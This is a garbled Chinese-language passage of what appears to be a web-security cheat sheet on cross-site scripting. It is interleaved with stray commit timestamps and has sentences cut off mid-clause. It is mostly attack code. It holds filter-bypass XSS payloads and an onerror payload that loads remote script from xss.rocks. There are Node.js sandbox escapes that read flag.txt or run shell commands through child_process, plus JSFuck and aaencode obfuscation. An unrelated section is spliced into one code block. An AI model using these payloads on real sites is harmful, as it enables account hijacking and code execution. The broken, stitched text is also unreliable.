<< /script/script>< script ~~~ > \u0061lert(1)</script ~~~>
< / style > < / scRipt > < scRipt > alert ( 1 ) < / scRipt >
< img src = x:prompt(eval(alt)) onerror = eval(src) alt = String.fromCharCode(88,83,83) >
< svg > < x > < script > a l e r t ( ' 1 ' & # 4 1 < / x >
< iframe src = "" / srcdoc = '<svg onload=alert(1)>' >
2021-06-02 22:22:26 +00:00
< svg > < animate onbegin = alert() attributeName = x > < / svg >
2020-07-15 15:43:14 +00:00
< img / id = "alert('XSS') \"/alt= \"/ \"src= \"/ \"onerror=eval(id) >
2023-05-03 17:27:46 +00:00
< img src = 1 onerror = "s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);" >
2023-10-16 21:15:46 +00:00
(function(x){this[x+`ert`](1)})`al`
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
document['default'+'View'][`\u0061lert`](3)
2020-07-15 15:43:14 +00:00
```
2023-08-03 19:12:22 +00:00
### 在302响应中进行头部注入的XSS攻击
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
如果你发现可以在302重定向响应中**注入头部**,你可以尝试让浏览器**执行任意的JavaScript代码**。这并不容易, ,
2020-10-16 10:44:40 +00:00
2023-10-16 21:15:46 +00:00
在[**这个报告**](https://www.gremwell.com/firefox-xss-302)和[**这个报告**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/)中, ,
2023-08-03 19:12:22 +00:00
已知的协议有:`mailto://`, , , , ,
2022-06-23 12:12:25 +00:00
2023-08-03 19:12:22 +00:00
### 仅限字母、数字和点号
2022-06-23 12:12:25 +00:00
2023-10-16 21:15:46 +00:00
如果你能指定**回调函数**将要**执行**的JavaScript代码,
2023-01-05 13:05:03 +00:00
2023-08-03 19:12:22 +00:00
### 可用于XSS的有效`<script>`内容类型
2023-01-05 13:05:03 +00:00
2023-10-16 21:15:46 +00:00
(来自[**这里**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/))如果你尝试加载一个带有`application/octet-stream`等**内容类型**的脚本, :
2023-01-05 13:05:03 +00:00
2023-08-03 19:12:22 +00:00
> 拒绝执行来自 '[https://uploader.c.hc.lc/uploads/xxx'](https://uploader.c.hc.lc/uploads/xxx') 的脚本, ( ) ,
2023-01-05 13:05:03 +00:00
2023-10-16 21:15:46 +00:00
唯一支持Chrome运行**加载的脚本**的**内容类型**是位于[https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third\_party/blink/common/mime\_util/mime\_util.cc](https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third\_party/blink/common/mime\_util/mime\_util.cc)中的常量**`kSupportedJavascriptTypes`**中的内容。
2023-01-05 13:05:03 +00:00
```c
const char* const kSupportedJavascriptTypes[] = {
2023-08-03 19:12:22 +00:00
"application/ecmascript",
"application/javascript",
"application/x-ecmascript",
"application/x-javascript",
"text/ecmascript",
"text/javascript",
"text/javascript1.0",
"text/javascript1.1",
"text/javascript1.2",
"text/javascript1.3",
"text/javascript1.4",
"text/javascript1.5",
"text/jscript",
"text/livescript",
"text/x-ecmascript",
"text/x-javascript",
2023-01-05 13:05:03 +00:00
};
```
2023-08-03 19:12:22 +00:00
### XSS中的脚本类型
2023-01-05 13:05:03 +00:00
2023-08-03 19:12:22 +00:00
(来自[**这里**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/))那么,有哪些类型可以用来加载脚本呢?
2023-01-05 13:05:03 +00:00
```html
< script type = "???" > < / script >
```
2023-08-03 19:12:22 +00:00
答案是:
2023-01-05 13:05:03 +00:00
2023-08-03 19:12:22 +00:00
* **module**(默认值,无需解释)
2023-08-08 08:33:05 +00:00
* [**webbundle** ](https://web.dev/web-bundles/ ): , ( ** `.wbn` ** 文件中。
2023-01-05 13:05:03 +00:00
```html
< script type = "webbundle" >
{
2023-08-03 19:12:22 +00:00
"source": "https://example.com/dir/subresources.wbn",
"resources": ["https://example.com/dir/a.js", "https://example.com/dir/b.js", "https://example.com/dir/c.png"]
2023-01-05 13:05:03 +00:00
}
< / script >
The resources are loaded from the source .wbn, not accessed via HTTP
```
2023-08-08 08:33:05 +00:00
* [**importmap** ](https://github.com/WICG/import-maps )**:
2023-01-05 13:05:03 +00:00
```html
< script type = "importmap" >
{
2023-08-03 19:12:22 +00:00
"imports": {
"moment": "/node_modules/moment/src/moment.js",
"lodash": "/node_modules/lodash-es/lodash.js"
}
2023-01-05 13:05:03 +00:00
}
< / script >
<!-- With importmap you can do the following -->
< script >
import moment from "moment";
import { partition } from "lodash";
< / script >
```
2023-08-08 08:33:05 +00:00
这种行为在[**这篇解决方案**](https://github.com/zwade/yaca/tree/master/solution)中被用来重新映射一个库到eval以滥用它来触发XSS。
2023-01-05 13:05:03 +00:00
2023-10-16 21:15:46 +00:00
* [**speculationrules** ](https://github.com/WICG/nav-speculation )**:
2023-01-05 13:05:03 +00:00
```html
< script type = "speculationrules" >
{
2023-08-03 19:12:22 +00:00
"prerender": [
{"source": "list",
"urls": ["/page/2"],
"score": 0.5},
{"source": "document",
"if_href_matches": ["https://*.wikipedia.org/**"],
"if_not_selector_matches": [".restricted-section *"],
"score": 0.1}
]
2023-01-05 13:05:03 +00:00
}
< / script >
```
2023-08-08 08:33:05 +00:00
### Web内容类型的XSS攻击
2023-01-05 13:05:03 +00:00
2023-08-08 08:33:05 +00:00
(来自[**这里**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) :
2023-01-05 13:05:03 +00:00
* text/html
* application/xhtml+xml
* application/xml
* text/xml
* image/svg+xml
2023-08-08 08:33:05 +00:00
* text/plain( , )
* application/rss+xml( )
* application/atom+xml( )
2023-01-05 13:05:03 +00:00
2023-08-08 08:33:05 +00:00
在其他浏览器中,可以使用其他**`Content-Types`**来执行任意JS, :
2023-01-05 13:05:03 +00:00
2023-08-08 08:33:05 +00:00
### xml内容类型
2023-03-03 17:26:17 +00:00
2023-08-08 08:33:05 +00:00
如果页面返回的是text/xml内容类型, :
2023-03-03 17:26:17 +00:00
```xml
< xml >
< text > hello< img src = "1" onerror = "alert(1)" xmlns = "http://www.w3.org/1999/xhtml" / > < / text >
< / xml >
<!-- Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 113). Kindle Edition. -->
```
2023-08-03 19:12:22 +00:00
### 特殊替换模式
2023-03-03 17:26:17 +00:00
2023-08-03 19:12:22 +00:00
当使用类似于 ** `"some {{template}} data".replace("{{template}}", <user_input>)` ** 的代码时,攻击者可以使用[**特殊字符串替换**](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global\_Objects/String/replace#specifying\_a\_string\_as\_the\_replacement)来尝试绕过某些保护措施:``"123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"}))``
2023-01-05 13:05:03 +00:00
2023-08-08 08:33:05 +00:00
例如,在[**这篇文章**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA)中,这种方法被用来在脚本中**转义 JSON 字符串**并执行任意代码。
### Chrome 缓存到 XSS
2023-01-05 13:05:03 +00:00
2023-08-08 08:33:05 +00:00
{% content-ref url="chrome-cache-to-xss.md" %}
[chrome-cache-to-xss.md ](chrome-cache-to-xss.md )
{% endcontent-ref %}
2023-01-13 17:40:30 +00:00
2023-08-08 08:33:05 +00:00
### XS Jails 逃逸
2022-07-10 22:26:52 +00:00
2023-08-08 08:33:05 +00:00
如果你只能使用有限的字符集,可以查看这些其他有效的 XSJail 问题解决方案:
2022-07-10 22:26:52 +00:00
```javascript
// eval + unescape + regex
eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))()
eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequire(%27repl%27)%2estart()%22)()%2f/))
// use of with
with(console)log(123)
with(/console.log(1)/)with(this)with(constructor)constructor(source)()
2023-08-03 19:12:22 +00:00
// Just replace console.log(1) to the real code, the code we want to run is:
//return String(process.mainModule.require('fs').readFileSync('flag.txt'))
2022-07-10 22:26:52 +00:00
with(process)with(mainModule)with(require('fs'))return(String(readFileSync('flag.txt')))
with(k='fs',n='flag.txt',process)with(mainModule)with(require(k))return(String(readFileSync(n)))
with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))
2023-08-03 19:12:22 +00:00
//Final solution
2022-07-10 22:26:52 +00:00
with(
2023-08-03 19:12:22 +00:00
/with(String)
with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)
with(mainModule)
with(require(k))
return(String(readFileSync(n)))
/)
2022-07-10 22:26:52 +00:00
with(this)
2023-08-03 19:12:22 +00:00
with(constructor)
constructor(source)()
2022-07-10 22:26:52 +00:00
// For more uses of with go to challenge misc/CaaSio PSE in
// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE
```
2023-08-08 08:33:05 +00:00
如果在执行不受信任的代码之前**一切都是未定义的**(就像在[**这篇文章**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/#miscx2fundefined55-solves)中所述) ,
```javascript
// although import "fs" doesn’
import("fs").then(m=>console.log(m.readFileSync("/flag.txt", "utf8")))
```
2023-10-16 21:15:46 +00:00
* 间接访问`require`
2023-08-08 08:33:05 +00:00
2023-10-16 21:15:46 +00:00
[根据这个 ](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050 ) Node.js将模块包装在一个函数中, :
2023-08-08 08:33:05 +00:00
```javascript
(function (exports, require, module, __filename, __dirname) {
// our actual module code
});
```
因此,如果我们可以从该模块中**调用另一个函数**,就可以使用`arguments.callee.caller.arguments[1]`从该函数中访问**`require`**:  
{% code overflow="wrap" %}
```javascript
(function(){return arguments.callee.caller.arguments[1]("fs").readFileSync("/flag.txt", "utf8")})()
```
{% endcode %}
与前面的示例类似,可以使用错误处理程序来访问模块的包装器并获取`require`函数:
```javascript
try {
null.f()
} catch (e) {
TypeError = e.constructor
}
Object = {}.constructor
String = ''.constructor
Error = TypeError.prototype.__proto__.constructor
function CustomError() {
const oldStackTrace = Error.prepareStackTrace
try {
Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace
Error.captureStackTrace(this)
this.stack
} finally {
Error.prepareStackTrace = oldStackTrace
}
}
function trigger() {
const err = new CustomError()
console.log(err.stack[0])
for (const x of err.stack) {
// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arugments to get the parameter
const fn = x.getFunction()
console.log(String(fn).slice(0, 200))
console.log(fn?.arguments)
console.log('='.repeat(40))
if ((args = fn?.arguments)?.length > 0) {
req = args[1]
console.log(req('child_process').execSync('id').toString())
}
}
}
trigger()
```
2023-08-03 19:12:22 +00:00
### 混淆和高级绕过
2022-07-10 22:26:52 +00:00
2023-10-16 21:15:46 +00:00
* **同一页面中的不同混淆方法:** [**https://aem1k.com/aurebesh.js/** ](https://aem1k.com/aurebesh.js/ )
2020-07-15 15:43:14 +00:00
* [https://github.com/aemkei/katakana.js ](https://github.com/aemkei/katakana.js )
2022-02-02 15:35:20 +00:00
* [https://ooze.ninja/javascript/poisonjs ](https://ooze.ninja/javascript/poisonjs )
* [https://javascriptobfuscator.herokuapp.com/ ](https://javascriptobfuscator.herokuapp.com )
* [https://skalman.github.io/UglifyJS-online/ ](https://skalman.github.io/UglifyJS-online/ )
2021-10-18 11:21:18 +00:00
* [http://www.jsfuck.com/ ](http://www.jsfuck.com )
2023-08-03 19:12:22 +00:00
* 更复杂的JSFuck:
2020-07-15 15:43:14 +00:00
* [http://utf-8.jp/public/jjencode.html ](http://utf-8.jp/public/jjencode.html )
2021-05-27 11:24:11 +00:00
* [https://utf-8.jp/public/aaencode.html ](https://utf-8.jp/public/aaencode.html )
2022-09-23 09:06:24 +00:00
* [https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses ](https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses )
2020-07-15 15:43:14 +00:00
```javascript
2021-05-27 11:24:11 +00:00
//Katana
2020-07-15 15:43:14 +00:00
< script > ( [ , ウ , , , , ア ] = [ ] + { } , [ ネ , ホ , ヌ , セ , , ミ , ハ , ヘ , , , ナ ] = [ ! ! ウ ] + ! ウ + ウ . ウ ) [ ツ = ア + ウ + ナ + ヘ + ネ + ホ + ヌ + ア + ネ + ウ + ホ ] [ ツ ] ( ミ + ハ + セ + ホ + ネ + '(-~ウ)' ) ( ) < / script >
```
```javascript
2023-08-03 19:12:22 +00:00
//JJencode
2020-07-15 15:43:14 +00:00
< script > $ =~ []; $ = { ___ :++ $ , $ : ( ! [] + "" )[ $ ], __$ :++ $ , $_$_ : ( ! [] + "" )[ $ ], _$_ :++ $ , $_$ : ({} + "" )[ $ ], $_$ : ( $ [ $ ] + "" )[ $ ], _$ :++ $ , $_ : ( ! "" + "" )[ $ ], $__ :++ $ , $_$ :++ $ , $__ : ({} + "" )[ $ ], $_ :++ $ , $ :++ $ , $___ :++ $ , $__$ :++ $ }; $ . $_ = ( $ . $_ = $ + "" )[ $ . $_$ ] + ( $ . _$ = $ . $_ [ $ . __$ ]) + ( $ . $ = ( $ . $ + "" )[ $ . __$ ]) + (( ! $ ) + "" )[ $ . _$ ] + ( $ . __ = $ . $_ [ $ . $_ ]) + ( $ . $ = ( ! "" + "" )[ $ . __$ ]) + ( $ . _ = ( ! "" + "" )[ $ . _$_ ]) + $ . $_ [ $ . $_$ ] + $ . __ + $ . _$ + $ . $ ; $ . $ = $ . $ + ( ! "" + "" )[ $ . _$ ] + $ . __ + $ . _ + $ . $ + $ . $ ; $ . $ = ( $ . ___ )[ $ . $_ ][ $ . $_ ]; $ . $ ( $ . $ ( $ . $ + " \"" + $ . $_$_ + ( ! [] + "" )[ $ . _$_ ] + $ . $_ + " \\" + $ . __$ + $ . $_ + $ . _$_ + $ . __ + "(" + $ . ___ + ")" + " \"" )())();</ script >
```
```javascript
//JSFuck
2023-08-08 08:33:05 +00:00
< script > ( + [ ] ) [ ( [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( [ ] [ [ ] ] + [ ] ) [ + ! + [ ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + [ ] ] + ( ! ! [ ] + [ ] ) [ + ! + [ ] ] + ( [ ] [ [ ] ] + [ ] ) [ + [ ] ] + ( [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + [ ] ] + ( ! [ ] + [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! ! [ ] + [ ] ) [ + ! + [ ] ] ] [ ( [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( [ ] [ [ ] ] + [ ] ) [ + ! + [ ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + [ ] ] + ( ! ! [ ] + [ ] ) [ + ! + [ ] ] + ( [ ] [ [ ] ] + [ ] ) [ + [ ] ] + ( [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + [ ] ] + ( ! [ ] + [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! ! [ ] + [ ] ) [ + ! + [ ] ] ] ( ( ! [ ] + [ ] ) [ + ! + [ ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + [ ] ] + ( [ ] [ ( [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( [ ] [ [ ] ] + [ ] ) [ + ! + [ ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + [ ] ] + ( ! ! [ ] + [ ] ) [ + ! + [ ] ] + ( [ ] [ [ ] ] + [ ] ) [ + [ ] ] + ( [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + [ ] ] + ( ! [ ] + [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! ! [ ] + [ ] ) [ + ! + [ ] ] ] + [ ] ) [ [ + ! + [ ] ] + [ ! + [ ] + ! + [ ] + ! + [ ] + ! + [ ] ] ] + [ + [ ] ] + ( [ ] [ ( [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( [ ] [ [ ] ] + [ ] ) [ + ! + [ ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + [ ] ] + ( ! ! [ ] + [ ] ) [ + ! + [ ] ] + ( [ ] [ [ ] ] + [ ] ) [ + [ ] ] + ( [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + [ ] ] + ( ! [ ] + [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! ! [ ] + [ ] ) [ + ! + [ ] ] ] + [ ] ) [ [ + ! + [ ] ] + [ ! + [ ] + ! + [ ] + ! + [ ] + ! + [ ] + ! + [ ] ] ] ) ( ) < / script >
2020-07-15 15:43:14 +00:00
2021-05-27 11:24:11 +00:00
```javascript
//aaencode
2023-08-03 19:12:22 +00:00
# XSS (跨站脚本攻击)
2023-08-24 09:57:53 +00:00
## 描述
2023-08-03 19:12:22 +00:00
2023-08-24 09:57:53 +00:00
XSS (跨站脚本攻击) 是一种常见的网络安全漏洞,攻击者通过在受害者的网页中注入恶意脚本,从而在用户浏览器中执行恶意代码。这种攻击可以导致用户的敏感信息被窃取、会话劫持以及其他恶意行为。
2023-08-03 19:12:22 +00:00
2023-08-24 09:57:53 +00:00
## 攻击示例
2023-08-16 09:07:58 +00:00
2023-08-24 09:57:53 +00:00
以下是一个简单的 XSS 攻击示例:
2023-08-03 19:12:22 +00:00
2023-08-08 08:33:05 +00:00
```javascript
2023-10-16 21:15:46 +00:00
゚ω゚ノ= /`m´)ノ ~┻━┻ //*´∇`*/ ['_']; o=(゚ー゚) =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) =(゚Θ゚)= (o^_^o)/ (o^_^o);(゚Д゚)={゚Θ゚: '_' ,゚ω゚ノ : ((゚ω゚ノ==3) +'_') [゚Θ゚] ,゚ー゚ノ :(゚ω゚ノ+ '_')[o^_^o -(゚Θ゚)] ,゚Д゚ノ:((゚ー゚==3) +'_')[゚ー゚] }; (゚Д゚) [゚Θ゚] =((゚ω゚ノ==3) +'_') [c^_^o];(゚Д゚) ['c'] = ((゚Д゚)+'_') [ (゚ー゚)+(゚ー゚)-(゚Θ゚) ];(゚Д゚) ['o'] = ((゚Д゚)+'_') [゚Θ゚];(゚o゚)=(゚Д゚) ['c']+(゚Д゚) ['o']+(゚ω゚ノ +'_')[゚Θ゚]+ ((゚ω゚ノ==3) +'_') [゚ー゚] + ((゚Д゚) +'_') [(゚ー゚)+(゚ー゚)]+ ((゚ー゚==3) +'_') [゚Θ゚]+((゚ー゚==3) +'_') [(゚ー゚) - (゚Θ゚)]+(゚Д゚) ['c']+((゚Д゚)+'_') [(゚ー゚)+(゚ー゚)]+ (゚Д゚) ['o']+((゚ー゚==3) +'_') [゚Θ゚];(゚Д゚) ['_'] =(o^_^o) [゚o゚] [゚o゚];(゚ε゚)=((゚ー゚==3) +'_') [゚Θ゚]+ (゚Д゚) .゚Д゚ノ+((゚Д゚)+'_') [(゚ー゚) + (゚ー゚)]+((゚ー゚==3) +'_') [o^_^o -゚Θ゚]+((゚ー゚==3) +'_') [゚Θ゚]+ (゚ω゚ノ +'_') [゚Θ゚]; (゚ー゚)+=(゚Θ゚); (゚Д゚)[゚ε゚]='\\'; (゚Д゚).゚Θ゚ノ=(゚Д゚+ ゚ー゚)[o^_^o -(゚Θ゚)];(o゚ー゚o)=(゚ω゚ノ +'_')[c^_^o];(゚Д゚) [゚o゚]='\"';(゚Д゚) ['_'] ( (゚Д゚) ['_'] (゚ε゚+(゚Д゚)[゚o゚]+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚Θ゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ 